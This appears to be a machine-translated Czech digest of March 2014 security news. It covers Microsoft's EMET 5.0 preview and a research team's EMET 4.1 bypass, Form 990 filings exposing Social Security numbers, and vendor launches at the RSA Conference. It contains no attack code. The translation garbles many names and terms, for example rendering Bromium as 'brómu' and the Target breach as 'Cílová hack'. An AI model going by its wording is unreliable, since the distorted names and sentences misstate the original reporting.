Stejně jako vědci zveřejní jejich úspěšný pokus o vytvoření útoku kód pro obcházení ochran na nejnovější verzi Microsoft Enhanced Experience Toolkit zmírňování (v4.1), Redmond gigant oznámil náhledu vydání Emet 5.0.
"EMET předpokládá, že nejvíce společných akcí a techniky protivníci mohou používat v ohrožení počítače, a mohou pomoci chránit počítač tím, že odkloní, ukončení, blokování a zrušení platnosti těchto opatření a technik. V posledních 0-dnů, to bylo účinné zmírnění proti paměti korupce, "Chris Betz, ředitel Microsoft Security Response Center v důvěryhodné Computing Group společnosti Microsoft vysvětlil v blogu. Vývojáři z Emet technický tým společnosti jsou v současné době prokazují staré i tuto novou verzi bezpečnostního softwaru na RSA Conference v současné době koná v San Franciscu. Oni jsou také volání na uživatele vyzkoušet uvolňování a nabídnout zpětnou vazbu o nových funkcí a vylepšení. Dvě nové funkce ochrany zavedené v Emet 5.0 Technické Preview - na vrcholu 12 vestavěných zabezpečení migrace zahrnuto ve verzi 4.1. -. Jsou redukce útoku (ASR) a Export Address Table Filtrování Plus (EAF +) . Jak už název sám o sobě říká, útok Povrchová Snížení si klade za cíl snížit útoku aplikací "To může být použit jako mechanismus pro blokování použití z několika specifických modulů nebo plug-inů v rámci aplikace, "tým vysvětluje . "Například, můžete nastavit Emet, aby se zabránilo Microsoft Word načítání Adobe Flash Player plug-in, nebo s podporou bezpečnostních zón, můžete použít Emet, aby se zabránilo Internet Explorer načítání Java plug-in na internetu zóně Webové stránky, zatímco pokračuje, aby Java na webových stránkách Intranet Zone. Adobe Flash Player a Java plug-iny nejsou jediní, můžete blokovat - funkce umožňuje uživateli konfigurovat tak, aby jeho nebo její preference, a to jak pokud jde o plug- iny a bezpečnostní zóny. "EOP + konsoliduje ochranu na nižší úrovni modulů a zabraňuje určitým těžební techniky používané pro vytváření dynamických ROP miniaplikace v paměti z vývozních tabulkách" se dále vysvětleno. funkce nabízí řadu dalších ochranných opatření, jako jsou dodatečné kontroly integrity na zásobník registrů a zásobníku limity při exportu tabulky jsou čteny z některých modulů na nižší úrovni, a prevence paměťových operace čtení na chráněných vývozních tabulek, pokud pocházejí z podezřelých modulů. Dodatečné kalení a výchozí nastavení zmírnění jsou také zahrnuty a budou hodnoceny z hlediska začlenění v konečné verzi.
Neziskové daňové formuláře zaslané podle IRS vystavit 630.000 SSNs
4.3.2014 Bezpečnost
Odhaduje se, že 630.000 čísla sociálního zabezpečení (SSNs) na nezisková daňové organizace "vrátí-Form 990s-byly zveřejněny on-line charitativní organizace a IRS od roku 2001, takže nechráněné spotřebitele v nebezpečí, že se stanou obětí krádeže identity, říkají, že výsledek výzkumu Identity Finder. rozdíl od osobních daňových přiznání na formuláři 1040, formulář 990s jsou veřejné dokumenty. Vzhledem k tomu, IRS nemá redigovat osobní údaje o původních formách, citlivé údaje, které patří do stipendijního příjemci, dárci, správců a zaměstnanců zůstává ve veřejné doméně. V některých případech, jména, plné adresy a detailní informace o transakci doprovázet SSNs. Navíc účetní organizací, které poznaly sebe pomocí jejich SSN, spíše než jejich Zpracovatel Daňové identifikační číslo (PTIN), byly také vystaveny. Mezi nejčastější pachatelé patří :
Advokacie organizace
Sdružení absolventů
Základy Společenství a stipendia
Soukromé nadace
Výzkumný tým Identity Finder byl schopen zjistit informace o vyhledávání s citlivou Solution Manager dat více než 3,8 milionů 990 formulářů mezi 2001 a první polovině roku 2013. sice alarmující množství dostupných osobních údajů je stále velkým problémem, Identity Finder naučil že dochází k pokroku na ochranu dat na novější formy:. procento organizací, které jsou zveřejněny alespoň jeden SSN se snížil z 16,6 procenta v roce 2001 na základě jednoho procenta v roce 2013 však celkový počet SSNs vystavených nadále roste rok co rok , a IRS "Úřad pro ochranu soukromí a informace odmítl odstranit existující SSNs z veřejných dokumentů. Problém exponovaných citlivých dat na 990 forem se nezlepšuje, ale zhoršuje při snižující se rychlosti. Tam bylo více než 11.000 nechráněné SSNs na 990 forem v loňském roce a 630.000 čísla sociálního pojištění stále zůstávají k dispozici pro zloději identity. Neziskové organizace, které se učí vydali SSNs by měl varovat postižených, že jejich jména a SSNs jsou součástí dokumentu o veřejné záznam, a že mohou být vystaveni zvýšenému riziku podvodného zneužití totožnosti. Dále, IRS by měly přijmout všechny dostupné kroky k odstranění SSNs z těchto veřejných listin. Chcete-li zobrazit celou zprávu si přečtěte návrhy pro organizace a spotřebitele, a používat Identity Finder EIN vyhledávací nástroj zjistit, zda vaše organizace vystavena SSNs on-line, jděte sem
Nové zdarma školení bezpečnostní software on-line kurzy
4.3.2014 Bezpečnost
Forum Software Assurance k dokonalosti v řádu (SAFECode), nezisková organizace pracující s cílem zvýšit důvěru v technologických produktů a služeb prostřednictvím prohlubování účinných metod zajišťování software, oznámila, že vydala nové vzdělávací bezpečnostní software kurzy jako součást své on-line Bezpečnostní inženýrství Školení o programu SAFECode. Security Engineering Školení o SAFECode je online komunita zdroj nabízí bezplatné kurzy bezpečnosti školení dodané prostřednictvím on-demand webová vysílání. Týkající se problematiky mohl zabránit SQL injection k zamezení request Cross Site padělání, kurzy jsou určeny pro použití jako stavební bloky pro ty, kteří chtějí vytvořit ve vlastní vzdělávací program pro jejich rozvojových produktovými týmy, stejně jako zájemce o zlepšení jejich dovedností. Nový kurz k dispozici pro okamžité prohlížení zahrnují:
Katalog Penetrační testování 101: Tento kurz poskytuje základ pro penetrační testování bezpečnosti výrobků. To shrnuje důležité penetrační testování konceptů a sdílí vhled do společných prvků útočníka myšlení.
Cross Site Scripting (XSS) 101: Tento kurz poskytuje divákům se základním pochopení základních koncepcí XSS. To pomůže divákům pochopit, kde ve webové aplikaci mohou očekávat, že najde XSS a poskytnout doporučení pro prevenci a sanaci XSS.
Secure Java Programming 101: Tento kurz poskytuje základní úvod do zajištění kódování v Javě. Diváci se seznámí s nejčastějšími útoků a nástrah, že Java programátor může setkat, spolu s technikami se jim vyhnout. Je navržen tak, aby výchozím bodem pro ty, Java zabezpečení nového.
Kromě toho, SAFECode uvolní následující předměty v příštích šesti týdnech:
Secure Memory Manipulace v C 101: Tento kurz poskytuje úvod do základní problematiky v bezpečném, kódování v C se zaměřením na bezpečnou manipulaci paměti. Jedná se konkrétně zaměřuje na otázky spojené s tradičním string (char *) manipulace, polí a formátovacích řetězcích.
Použití kryptografie Správná cesta: Tento kurz poskytuje přehled o tom, jak používat kryptografii bezpečným způsobem a zahrnuje témata jako jsou použití hash a rozdíly mezi symetrickým a asymetrickým šifrováním. Poskytuje příklady kryptografie v akci a posiluje význam využití dobře zavedené a uznávané kryptografické sady nástrojů.
Tyto nové bezpečnostní inženýrství Školení o SAFECode kurzy jsou založeny na vzdělávacích materiálů darovaných SAFECode jeho členských firem. Tým technických expertů z celého členství SAFECode přezkoumala a doplněny všechny studijní materiály s cílem zajistit jejich širokou použitelnost napříč různých vývojových prostředích.
Qualys představuje kontinuální monitoring cloud služby
4.3.2014 Bezpečnost
Qualys představil kontinuálního monitorování , nejnovější přírůstek do své QualysGuard Cloud Platform, na konferenci RSA v San Franciscu.
Tato nová nabídka poskytuje organizacím schopnost proaktivně identifikovat hrozby a neočekávané změny v Internet zařízení směřujících v rámci svých DMZ, prostředí cloud-based a webových aplikací před tím, než jsou porušeny útočníky. To přináší nové paradigma pro správu slabých míst, posílení zákazníkům průběžně sledovat kritické majetek po celou dobu jejich obvodu a okamžitě se upozornil na nesrovnalosti, které by je mohly vystavit na kybernetické útoky. Ve MarketScope pro posouzení zranitelnosti, Gartner analytik Kelly Kavanagh poznamenal, "Gartner zranitelnost Činnosti životní cyklus řízení jsou bezpečné konfigurace aktiv IT, pravidelné hodnocení zranitelnosti a dodržování konfigurace bezpečnostní politiky, sanace zranitelnosti nebo problémy s konfigurací zabezpečení a průběžného monitorování pro detekci škodlivých události nebo činnosti. používání výrobků nebo služeb jako VA nejlepší praxe byla začleněna do řady normativních režimů dodržování ... zejména, Národní institut pro standardy a technologie (NIST) 800-53 požadavky na "kontinuální monitorování" slouží jako urychlovač pro frekvenci VA použití. "
Postaveno na QualysGuard Cloud platformu používá většina firem z žebříčku Fortune 1000 a tisíce firem po celém světě, tato nová služba umožňuje společnostem, aby průběžně sledovat: Hostitelé a zařízení vystavené na internetu - vidět kdykoliv systémy se objeví, zmizí, nebo se systémem neočekávané operační systémy. Digitální certifikáty - ke sledování SSL certifikátů používaných v systémech vědět, jestli jsou slabé nebo self-signed, a když se to skončit. porty a služby spuštěné v každém systému - mít přehled o kterém síťové porty jsou otevřený, které protokoly jsou používány, a zda se v průběhu času mění. Chyby na hostiteli nebo aplikací - vědět, když se objeví slabá místa (nebo znovu), zda mohou být využity, a jsou-li k dispozici záplaty. aplikace instalované na obvodové systémy - najít se, když se aplikace software nainstalovány nebo odebrány z těchto systémů. Když Nepřetržité monitorování detekuje změny v obvodu, které by mohly vést k vykořisťování, upozorní odpovědný IT personál přidělený do těchto aktiv, aby přijaly vhodná opatření ke zmírnění. Okamžité oznámení poskytuje kontinuální monitoring uvolní bezpečnostní týmy ze zpoždění a zátěž čekání na plánované skenování okna a probírat zpráv. "Cloud rozšiřuje hranice podnikové obvodu zahrnout každý prohlížeče, zařízení nebo aplikace, která se dotýká Internetu, nás opouští více vystaveny kybernetických útoků, než kdy jindy, "řekl Philippe Courtot, předseda představenstva a generální ředitel Qualys." S naší průkopnické Průběžné monitorovací služby, mohou společnosti vidět jejich obvodu, jak dnešní hackeři dělat, aby hrozby mohou být identifikovány a řešeny před se promění porušení. " QualysGuard Nepřetržité monitorování je k dispozici hned v Beta pro všechny zákazníky. Obecná dostupnost je naplánováno na 27.března 2014. To je prodáváno jako roční předplatné na základě počtu obvodové IP, který je monitorován, začíná na 295 dolarů pro malé a střední podniky a 1995 dolarů pro větší podniky. První verze této služby zahrnuje kontinuální monitorování síťových zařízení a další vydání bude zahrnovat monitoring webových aplikací.
Identifikovat a opravit chyby zabezpečení vašich SSL certifikátů
3.3.2014 Zranitelnosti
Na tuto měnu oznámil tuto měnu certifikát inspektora , nástroj určený pro rychlé vyhledání problémů v konfiguraci certifikátů a provádění, a poskytuje v reálném čase analýzu celého certifikátu krajiny organizace, včetně ukončení pracovního poměru koncových bodů protokolu SSL.
SSL / TLS certifikáty jsou klíčovým obrana proti nežádoucímu dohledu on-line aktivity uživatelů. Přesto až příliš často správci systému nepodaří správně nakonfigurovat certifikáty, nevědomky odchodu otevřené zranitelnosti. Držet krok s nejnovějšími bezpečnostními osvědčených postupů, jakož i sledování certifikátů je náročný úkol, zejména pro podniky, které spravují tisíce certifikátů. Často, manuální sledování procesů se používají, které zavádějí lidské chyby a způsobit prostoje nebo neznámá slabá místa zabezpečení, jako jsou konfigurace s kódové soupravy odolné vůči zločinu, BEAST, PORUŠENÍ nebo jiné útoky. V ostatních případech, oddělení mimo to by mohlo nasadit své vlastní certifikáty , vytvoření slepé místo pro administrátory. To může také vést k konfiguračních problémů, které downgrade účinnost SSL certifikátů, na kterých organizace spoléhají. Pokud certifikát inspektora, může bezpečnostní profesionálové objevovat zapomenuté, zanedbané nebo chybně nakonfigurován certifikáty, a identifikovat potenciální zranitelná místa, jako jsou slabé klíče, problematické šifer a osvědčení vypršela . Pro každou potenciální hrozby zjištěné, nástroj poskytuje seznam sanacemi. Certifikát inspektor kontroluje síť uživatele odhalovat všechny certifikáty v provozu, kontroluje konfiguraci SSL a provádění, a poté zobrazí výsledky v intuitivním a interaktivním palubní desce. profesionálové zabezpečení může použít nástroj pro:
Zjištění jejich bezpečnostní účaří s reálném čase, komplexní přehled o SSL certifikátech a jejich ukončení koncových bodů v celé síti.
Detekce zranitelnosti prostřednictvím skenování pro problematické osvědčení nebo serverových konfigurací a snadno zkontrolovat výsledky pomocí certifikátu inspekční intuitivní dashboard.
Analýza datových bodů bezpečnostních buď kamenivo nebo specifické pro každý certifikát a koncový bod.
Zmírnit zjištěné chyby, jako jsou šelmy, a nedodržování směrnic průmyslu, jako jsou CA / Browser Forum základních požadavků, a to prostřednictvím doporučených kroků.
Obnovit vypršení certifikátů prostřednictvím výslovného dotačního procesu DigiCert je.
Archiv snímků z každé detekční událost dokumentují zlepšení v průběhu času.
Run zprávy z libovolného místa s administrativními kontrolami cloud-based DigiCert je.
Pomocí patentovaného algoritmu, certifikát Inspektor analyzuje SSL certifikáty a zánik koncové body pro mnoho bezpečnostních faktorů, včetně:
Slabé klíče, šifry a hašovací algoritmy
Verze SSL / TLS
Vypršení platnosti certifikátů
TLS opětovné projednání
Perfect Forward Secrecy
Konfigurace náchylnost k trestné činnosti, PORUŠENÍ, BEAST atd.
Jména Neshoda server / certifikát
Chybí AIA je.
Pro každý SSL certifikát a ukončení koncový bod, správci obdrží zprávu o zranitelnosti, odpovídající třídy a rychlý seznam osvědčených postupů ke zmírnění zjištěných nedostatků. "Poskytnutím žalovatelné informace o konfiguraci certifikátů a stavu nasazení, v kombinaci s nápravným nástrojů, DigiCert pomáhá organizacím zavřít Rozdíl mezi zakázek certifikátu a bezpečné nasazení certifikátů, "řekl generální ředitel společnosti DigiCert Nicholas Hales. "Nasazení pevně nakonfigurovaných certifikátů je důležitým linii obrany proti unwelcomed dohledu. Certifikát inspektor pomůže organizacím zářit světlo na oblastech spadajících do jejich sítě, které by mohly představovat číhající hrozby. Věříme, že tento nástroj může stavět na úsilí druhých v bezpečnostní komunity s cílem zlepšit on-line důvěru v nové, hmatatelným způsobem. "
Zdarma řízení zranitelnost služeb pro malé a střední firmy
3.3.2014 Zranitelnosti
Tripwire debutoval Tripwire SecureScan, zdarma, cloud-based služeb pro správu zranitelností pro (IP adresy) až 100 Internet Protokolu o vnitřních sítí. Tento nový nástroj umožňuje správu slabých míst snadno dostupné pro malé a střední podniky, které nemusí mít prostředky pro bezpečnostní technologie podnikové třídy.
Menší podniky obvykle mají méně prostředků na investice do bezpečnosti, což je velmi atraktivní pro cyberattackers a podle společnosti Symantec, kybernetickým útokům na malé a střední podniky se zvýšil o 300 procent v roce 2012. Malé a střední podniky často spoléhají na anti-virus software a firewally, ale tyto bezpečnostní kontroly, zatímco užitečný, nestačí, protože nemají odhalit neopravených systémy, které jsou často cílené u cyberattackers. Tripwire SecureScan je komplexní řešení pro správu zranitelností, které nevyžaduje žádné hardware nebo Software musí být instalován a spravován. Organizace všech velikostí mohou využít službu zjistit podrobné informace o síťových zařízení a najít slabá místa v hardwarových a softwarových aplikací, které jsou používány v kybernetickým útokům. Řešení objeví tyto chyby a pak poskytuje uživatelům priorit, Podrobné informace o tom, jak opravit tyto bezpečnostní slabiny. To používá stejný osvědčené podnikové třídy pro skenování zranitelností platformy za Tripwire v produktech zranitelnosti Tripwire IP360 a Tripwire PureCloud Enterprise. . Tyto produkty chrání mnoho z největších a nejvíce citlivé sítí na světě Klíčové SecureScan funkce patří:
Volný vnitřní skenování zranitelnosti až 100 zařízení čtyřikrát měsíčně.
Snadná objev ztracené nebo skryté zařízení, které může vyústit v bezpečnostní slepých míst.
Prioritní zranitelnost bodování, který umožňuje nejprve opravit nejdůležitější bezpečnostní problémy.
"Organizace, které žijí" pod hranicí chudoby zabezpečení "jsou řezání zatáček na bezpečnost po celou dobu," řekla Wendy Nather, ředitel výzkumu, podnikání bezpečnostní praxe na 451 Research. "Oni nemusí mít odborné znalosti naladit a používat open source nástroj, a to buď. S komerční produkt k dispozici na nich zdarma vám může pomoci tyto podniky dostat nohu -. V některých případech poprvé "
Ochrana Microsoft Emet lze obejít, vědci ukazují,
3.3.2014 Bezpečnost
Microsoft Enhanced Mitigation Experience Toolkit (EMET) je dobrý kus softwaru a užitečné pro ochranu non-jádra aplikace Microsoft a software třetích stran, ale ochrana nabízí lze také obejít zcela v případě, že útočníci vědí, co dělají, výzkumníci tvrdí z bezpečnostní firmy brómu.
"EMET dodává zvláštní ochrany (pouze pro 32bitové procesy) proti relativně nový hacker techniku známou jako ROP (návrat orientované programování)," brómu Jared Demott vysvětlil v blogu . "ROP vykořisťování založen byl nekontrolovatelný v malware obejít ALSR + DEP ochrany. Většina malware in-the-wild odkryty v loňském roce použili variantu ROP technik. EMET přidává další užitečné ochran (jako síla ASLR a DEP) stejně, ale mnozí z nich jsou již přítomny v jejich nejnovějším operačním systém Windows 8.1. A tak Emet zvláště vyniká u starších platformách, jako je Windows XP. " Stejně jako jakýkoli jiný software, EMET má svá omezení, a vědci chtěli zjistit, zda je schopen vychylování přizpůsobené útoků. Vědci brómu, kteří pracovali s Microsoft v tomto výzkumu, vytvořili útočnou kód využívá staré (a záplatované) používají-po-free Internet Explorer chyba (CVE-2012 - 4969), aby se vyhnula všem 12 Emet v ochran. Tam je veřejná Metasploit využít modul pro tuto chybu, ale to je blokován Emet. Výzkumníci na základě oni na sofistikovanější jeden vytvořil Peter Vreugdenhil Exodus inteligence (a zpočátku blokovány bezpečnostní software). "Byli jsme zvědaví, zda využít by mohla být posílena, aby se vyhnula Emet 4.1," řekl výzkumníci. "V první řadě zajímat, chtěli jsme zjistit, jestli bychom mohli vyvinout obecný Emet bypass techniku pro kontrolu zásobníku čepu, protože tato ochrana nebyla veřejně obejít našich znalostí." A oni to udělali. Výsledky jejich výzkumu byly prezentovány v pondělí na konferenci BSides v San Franciscu, a byly uznány společností Microsoft, jehož vývojáři se snaží opravit objevené problémy v příštím Emet verzi. Ti zájem dozvědět se více o brómu v oblasti výzkumu - ale ne útok kód sám o sobě, protože to přirozeně nebyla zveřejněna - si můžete stáhnout whitepaper.
Egnyte jmenuje nové ČSÚ, odhaluje bezpečnostní plán
3.3.2014 Bezpečnost
Dnes na konferenci RSA , Egnyte oficiálně představen Kris Lahiri jako nový Chief Security Officer společnosti a představila svůj FY14 bezpečnostní plán, který upřesňuje plány společnosti na zvýšení globální standard pro bezpečné sdílení souborů v podniku. Kris Lahiri je spoluzakladatelem z Egnyte a byl viceprezident operací před přechodem do své nové role CSO. Před Egnyte, strávil mnoho let v designu a rozmístění rozsáhlé infrastruktury pro Fortune 100 zákazníků Valdero a KPMG Consulting. Kris má B.Tech v inženýrství od Indian Institute of Technology -. Banaras a MS z University of Cincinnati plány Lahiri patří přidání klíčových vylepšení zabezpečení a integrace pro bezpečné možností nasazení, ochraně osobních údajů a průmyslových standardů. Poslední, alarmující odhalení o PRISM a svalnatý programy NSA dali bezpečnost a soukromí top-of-mysl pro podniky. Kromě vládní špionáž novinky, velké úniky dat, hacking incidentů a rozsáhlé výpadky nutí podniky k vyhodnocení moudrost přijetí modelu cloud pouze pro sdílení a ukládání svých obchodních soubory. Lahiri je 2014 bezpečnostní plán se zaměřuje na rozšíření a integrace, aby Egnyte zákazníci s zabezpečený přístup k 100 procent svých obchodních souborů z libovolného zařízení, bez ohledu na to, kde tyto soubory fyzicky umístěny. "Egnyte je jediným řešením sdílení souborů postavený od základů až po uspokojení potřeb podniku," řekl Egnyte co- zakladatel a ČSÚ Kris Lahiri. "Jak se trh vyvíjí, tak se na potřeby našich zákazníků, a nic není životně důležité pro podnikání, než je bezpečnost své nejcennější - své obchodní údaje. V kombinaci s měnícími se průmyslových standardů, ve kterých jsou podniky s cílem vyhovět, jsme pochopili, jak důležité je sdílet naše cestovní mapu s našimi zákazníky tak, aby pochopili, jak Egnyte plánuje splnit všechny jejich potřeby v oblasti bezpečnosti nyní i do budoucna. " Deployment Podle Nedávný průzkum z Enterprise Strategy Group, 97 procent z cloudu osvojitelů přednost hybridní řešení. Egnyte je jediným poskytovatelem k tomu, aby on-premise, cloud-jen a hybridní nasazení modely, které umožňují podnikům přístup a uložení 100 procent svých souborů v tom, jak nejlépe odpovídá jejich potřebám. Pozdní v roce 2013, Egnyte zahájila Storage Connect, řešení, které umožňuje podnikům získat výhody cloud při zachování ukládání souborů čistě na obchodní prostory. V roce 2014, Egnyte očekává zvýšení Storage Connect na více rozměrů:
Granulovaný Audit & DLP integrace: Egnyte bude navazovat na stávající DLP řešení instalovaných v prostorách, což umožňuje zákazníkům v regulovaných odvětvích na počest komplexní politiky (tj. regulární výrazy, otisky prstů, strojového učení) o některých údajů, jako jsou informace o kreditní kartě, sociálního zabezpečení čísla, nebo informace o zdraví, a všechny soubory budou kontrolovány s cílem zajistit tyto údaje nebudou sdíleny mimo společnost. IT bude rovněž schopen kontrolovat soubor činností napříč jak mrak a on-premise souborů integrovaným způsobem.
Unified Identity Management: Ve spojení s RSA, Egnyte je také nadšený rozšířit své partnerství s OneLogin zjednodušit správu identit v rámci jednotného rámce, který bez ohledu na nasazení modelu si zákazník zvolí - mrak, v prostorách nebo hybridní.
Údaje
Egnyte je také přidání nových bezpečnostních prvků a integrace v každém bodu dotyku podél životního cyklu dat k dalšímu rozšíření zabezpečení dat, tyto funkce patří:
Endpoint Encryption: Tato schopnost bude zákazníkům poskytovat větší bezpečnost, pokud koncové zařízení je ztracena nebo ukradena, nebo pokud zaměstnanec opustí společnost. Šifrované soubory, které jsou stáhnuty a uloženy v těchto zařízeních budou přístupné pouze s klíčem, a že klíč může být odvolán vzdáleně IT.
Antivirová ochrana: Pro ochranu proti malwaru infikování zákaznických dat v cloudu, bude antivirový schopnost Egnyte v skenovat soubory před tím, než jsou uloženy na zajištění dat je malware zdarma.
Průmysl
V příštích 12 měsících, Egnyte je zaměřen na zvýšení úrovně dodržování předpisů pro několik odvětví, s důrazem na:
SOC2: Egnyte bude dokončit certifikaci pro své interní procesy, s prioritou na lepší auditu a kontroly při vývoji a budují platformu Egnyte.
Správa digitálních práv (DRM): Enhanced DRM zajistí větší kontrolu souborů pro citlivé materiály, jako je duševní vlastnictví nebo právní formy. IT týmy v regulovaných odvětvích budou moci vytvořit politiky o tom, co mohou uživatelé dělat s různými typy souborů.
Fotografie: Inovace Sandbox na konferenci RSA 2014
3.3.2014 Bezpečnost
Inovace Sandbox je obvykle jednou z nejzajímavějších událostí na konferenci RSA a kreslí docela dav, a tento rok není výjimkou.
Dr. Herbert (Hugh) Thompson, Program Židle na konferenci RSA a světově proslulý odborník na bezpečnost IT, který sloužil jako ceremoniář a hostitele:
Koncepce inovací Sandbox je jednoduchý: deset cherry-vybral společnosti mají možnost obrátit se na ošetřujícího dav a předvést své inovativní technologie a služby, a mezi nimi je vybrán jako nejvíce inovativní společnosti na konferenci. Letošní vítěz je RedOwl Analytics , jejichž hlavní produkt, Reveal, je softwarová aplikace, která dává smysl masivní digitalizace podniku, s cílem zvýšit povědomí o situaci s organizací a přímého omezených zdrojů k lidem a problémů, které nejvíce záleží.
Letošní druhý finalista jsou: Bílá Ops detekuje roboty v měřítku pomocí JavaScriptu. Je to boj proti podvodům a bezpečnostní řešení, které funguje stejně dobře pro reklamní průmysl, e-commerce a dodavatelem obchodních systémů podniku. Bluebox Security je stealth startup zaměřený na podnikové mobilní bezpečnosti.
Cylance PROTECT má matematický přístup k identifikaci malwaru, s využitím patentovaných strojového učení techniky místo podpisů a pískovišť. Tato technika efektivně vykresluje nový malware, viry, boty a neznámé budoucí varianty k ničemu. CO3 systémy automatizuje čtyři procesní pilíře reakce na incidenty: přípravu, hodnocení, řízení a hlášení. Díky automatizaci těchto kritických postupy a informování je založen na Incident Response osvědčených postupů, průmysl rámců a požadavky na dodržování předpisů, CO3 zajišťuje účinnost, přesnost a dodržování předpisů, a zároveň snižuje náklady a riziko. Optic by ThreatStream je SaaS-založené Threat Intelligence Platform, která využívá pro spolupráci, platforma pro agregaci globální, místní a důvěryhodné zpravodajství, analyzovat výsledný soubor dat, se automaticky integruje optimalizovaný hrozbách do stávajících systémů zákazníka. Skycure je aktivní mobilní bezpečnostní řešení, které řeší vznikající ohrožení bezpečnosti, aniž by byla ohrožena funkčnost, použitelnost nebo životnost baterie. Skycure umožňuje organizacím, aby přijali přinést své vlastní zařízení (BYOD) trend, ale stále poskytuje silnou ochranu a kontrolu. Defense.Net DDoS SWAT je Distributed Denial of Service (DDoS), služba zmírňování, který pracuje ve spojení s již probíhající zmírnění organizace DDoS infrastruktury s cílem zajistit kontinuitu provozu v největších a nejkomplexnějších útoků. Je zaměřen na "koncentrací rizik", které hlavní organizace čelí s jejich primární řešení zmírnění DDoS. Světlo Cyber poskytuje prediktivní řešení detekce narušení pro organizace, chrání je před cílených hrozeb. Na základě analýzy informací o síti a koncových bodů, profilování normální chování uživatelů sítě a zařízení, Light Cyber detekuje a upozorní na nebezpečné činnosti na počátku životního cyklu útoku, který umožňuje uživateli zablokovat útok před poškozením je hotovo. Cyphort Advanced Defense Threat Platform přesně detekuje a analyzuje hrozby příští generace a pokročilé malware, poskytovat žalovatelné, kontextuální inteligenci, která umožňuje bezpečnostní týmy, aby rychleji, efektivněji a jako chirurgické způsobem jako jejich útočníky reagovat.
Cílová hack pobídl americké firmy utrácet více na kybernetické bezpečnosti
3.3.2014 Hacking
Nový výzkum prováděný tento měsíc ukazuje, že útoky na mezinárodních podniků, včetně bank a maloobchodních gigantů, jako jsou Target, vedla k významnému 60% amerických dotázaných podniků zvýšit jejich kybernetické bezpečnosti rozpočet. Z těch podniků, které plánují zvýšit svou kybernetickou bezpečnost rozpočtu v průběhu následujících 12 měsíců, hlasité 78% uvedlo nedávné útoky, že mají významný vliv na jejich rozhodnutí.
Mezinárodní výzkum také zjistil, že 53% amerických firem dotazovaných se považují hrozbu kybernetických útoků jako jeden ze svých tří největších podnikatelských rizik, zrcadlení nedávné varování od Světového ekonomického fóra, které kybernetické útoky jsou jedním z 5 největších hrozeb, kterým čelí svět 2014. Výzkumné detaily obchodní zájmy a mínění po celém cyber a naznačuje silnou poptávku z velkých globálních společností pro větší inteligenci o povaze nových kybernetických hrozeb a lepší porozumění obchodní zranitelnosti. Nové poznatky přicházejí jako BAE Systems Applied Intelligence zprávy "podnikání a Cyber Threat: vzestup digitální kriminality ", která zjistila, že většina amerických respondentů (82%) očekává, že počet cílených kybernetických útoků zvýšit v průběhu příštích dvou let. To bylo okamžitě nápadné, že organizované skupiny podvodníků byly identifikovány nejvyšší počet respondentů v obou USA (52%) a v rámci skupiny průzkumu jako celku (55%), jako skupina považuje za nejpravděpodobnější montáž útoky. To by mohlo ukazovat na obavy kolem možného poškození počítačových povolen útoků podvodu přesně přírody prožívají Target a další. Výzkum také ukázal, že firmy se domnívají, že jejich zvýšení expozice internetovým hrozbám, způsobené novými způsoby práce, představuje riziko, protože přizpůsobit obchodní praktiky držet krok s hyper-propojeném světě. Například, 72% severoamerických respondentů si myslí, počítačové riziko spojené s mobilními technologiemi bylo významné riziko, ale pouze 61% byli jisti, že pochopili risks.3 Tváří v tvář těmto výzvám, je to alarmující si uvědomit, že značná část respondentů - asi třetina (31% v USA a 30% v celosvětovém měřítku) - stále ještě nevěří, že jejich představenstvo plně pochopili rizika, která Cyber. Chcete-li dále zkoumat, výzkum pak prozkoumal, jaké nástroje respondenti se domnívali, že pomůže jejich desky, aby se více opatření, aby se zabránilo kybernetických útoků. S jasnější pochopení zranitelnosti (prosazovaný 53% respondentů v USA a 50% celkové) a mají inteligenci, o připravovaných hrozeb (44% v USA a 47% celkově) ukázala nejpopulárnější odpovědi. Další poznatky amerických:
Cena: 29% respondentů odhaduje úspěšný kybernetický útok by stálo jejich organizace více než 75 milionů amerických dolarů, dalších 20% uvedlo, že více než US $ 15 milionů.
Příčina útoků: skupina identifikována jako nejpravděpodobnější montáž cílové útoky nejvyšším počtem amerických respondentů bylo organizované skupiny podvodníků (55% respondentů). Američané byli více znepokojeni, které jsou zapojeny do průmyslové špionáže, než jakýkoli jiný trh (47% ve srovnání s 40% v Kanadě, 37% ve Velké Británii a 35% v Austrálii).
Se týkají: Na otázku, co by byli nejvíce znepokojeni v případě úspěšného útoku, nejvíce obyčejná odezva v USA byl ztrátu dat zákazníků (61%). Druhé hodnocení se týkají mimo USA respondentů byla krádež duševního vlastnictví, - s Američany výrazně více zajímají o IP krádeže než jiné trhy (47% respondentů a ve srovnání s 38% v Kanadě, 35% ve Velké Británii, a 43% v Austrálii).
Důvěra: podstatná většina (88%) byli přesvědčeni, ve schopnosti jejich organizace, aby se zabránilo cílených kybernetických útoků. Menší, ale stále velká většina (77%), byli přesvědčeni, ve schopnosti svého sektoru, aby se zabránilo útokům.
Krizové plány: 28% amerických organizací dotazovaných ještě neměl, nebo nevěděli, krizových plánů v případě kybernetického útoku na jejich společnosti. Z těch respondentů, kteří se mají krizové plány, 56% si myslí, tito byli dobře zveřejněny. V Kanadě 70% dotázaných uvedlo, že krizové plány, ale jen 37% z těch, s plány uvedli, že byli dobře zveřejněny.
Konvergence: Z těch respondentů, kteří se setkávají cyber-umožnil podvod, 55% amerických respondentů a 50% kanadských respondentů očekává počítačové hrát stále významnější úlohu v oblasti finančního podvodu.
"Co tento výzkum jasně ukazuje, že americké firmy si stále více uvědomují kybernetickém ohrožení a mají řadu protiopatření v místě. Nicméně, digitální zločin jako celek - nebezpečná kombinace organizovaných skupin pachatelů trestné činnosti s využitím počítačové techniky provádět finanční trestné činnosti - je také velkým problémem, zejména proto, že nejnovější vlna high-profil útoky, "říká Martin Sutherland, výkonný ředitel , BAE Systems Applied Intelligence. "A jako počet cest otevřených zločinci v hyper-propojeném světě se zvyšuje, jsme svědky skutečné hlad ze strany podniků pro jasnější pochopení jejich vlastní zranitelnosti a až na minutu počítačové hrozby inteligence.
CryptoCube: Enterprise šifrovací a autentizační v jednom rackmount
3.3.2014 Šifrování
Na konferenci RSA 2014 Futurex oznámila vydání CryptoCube, účelové, all-in-one rack skříně pro bezpečné šifrování, dešifrování, ověřování a validace citlivých údajů.
